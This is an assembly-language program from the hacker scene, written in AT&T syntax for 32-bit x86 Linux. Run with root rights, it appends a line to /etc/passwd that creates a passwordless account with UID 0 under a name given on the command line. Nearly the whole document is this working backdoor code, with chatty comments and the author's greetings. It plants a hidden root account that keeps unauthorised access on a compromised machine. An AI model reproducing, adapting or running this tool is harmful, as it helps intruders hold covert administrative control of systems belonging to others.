# 32 bit asm code written in at&t syntax for the x86 processors wich adds # an user with root rights and no password # the user is specified as an argument from the command line # i didn't implement error checking for the argument so if you get a # segfault it's because you haven't typed an argument # i added some error checking for the open syscall, if you don't have # permission to open it or god knows what else it will exit with 2 # as it's status code, it doesn't mean anything it's a random number # usage ./add username # oh one last thing, you must have root rights to do this # greets UnPlugged, kiddie, Thugking,ins1der(trixter) and #nerds@undernet # coded by Serial Killah mail skillah@myway.com .section .data str: .ascii "::0:0:owned:/:/bin/sh\n" # modify this as you wish file: .ascii "/etc/passwd" # if you modify the file name be sure to aldo modify the FLENGTH constant .equ FLAGS, 02001 # opens the file in WR_ONLY and APPEND mode .equ PERM, 0644 # file permissions .equ EXIT, 1 # exit syscall .equ WRITE, 4 # write syscall .equ OPEN, 5 # i wonder.. .equ CLOSE, 6 # uhm what could it be .equ SYSCALL, 0x80 # the interrupt .equ FLENGTH, 11 # file length .section .text .globl _start _start: # OPEN THE FILE movl $OPEN, %eax # moving the open syscall into %eax movl $file, %ebx # moving the address of file into %ebx movl $FLAGS, %ecx # moving the write mode into %ecx movl $PERM, %edx # opening the file in u=rw,g=r,o=r mode int $SYSCALL # waking up the kernel, heh cmpl $0, %eax # checking to see if the open syscall worked, if not exiting with a different status jle error # jumping to error movl %eax, %esi # moving the file descriptor into %esi, or the errno pushl 8(%esp) # putting the argument on the stack call strlen # calling the strlen function addl $4, %esp # removing the argument from the stack # WRITE 8(%esp) movl %eax, %edx # moving the argument length into %edx movl $WRITE, %eax # moving the write syscall into %eax movl %esi, %ebx # moving the file descriptor into %ebx movl 8(%esp), %ecx # moving the argument into %ecx int $SYSCALL # ... pushl $str # putting the rest of the string on the stack call strlen # again calling the strlen function addl $4, %esp # bla bla subl $FLENGTH, %eax # substracting the file length from str # WRITE $str movl %eax, %edx # movl $WRITE, %eax # same as above only it's the str we are writing this time movl %esi, %ebx # movl $str, %ecx # int $SYSCALL # # CLOSE movl $CLOSE, %eax # moving the close syscall into %eax int $SYSCALL # %ebx already has the file descriptor so all we have to do is call the interrupt handler # EXIT movl $EXIT, %eax # moving the exit syscall into %eax movl $0, %ebx # 0 is the status code, check it by typing "echo $?" int $SYSCALL # calling the interrupt handler error: movl $1, %eax # same as above movl $2, %ebx # the only thing different is that we put 2 as the status code wich means an error int $SYSCALL # .. .type strlen, @function # declaring strlen as a function strlen: # adjusting it's label pushl %ebp # pushing %ebp on the stack movl %esp, %ebp # moving the stack pointer into %ebp movl 8(%ebp), %ebx # puttin whatever it is we pushed on the stack into %ebx movl $0, %edi # movingo 0 into %edi count: # the place where the counting really happens movb (%ebx,%edi,1), %al # moving one byte at a time from %ebx into %al cmpb $0, %al # checking these bytes against 0 to see if it's the end of the string je exit # if it is then jump to exit incl %edi # if not increment edi so we can copy the next byte jmp count # and jump to count, the beginning of the loop exit: # exiting the function movl %edi, %eax # moving the number of bytes (string length) into %eax movl %ebp, %esp # moving the base pointer into %esp popl %ebp # taking off into %ebp whatever is at %esp ret # returning to the main stuff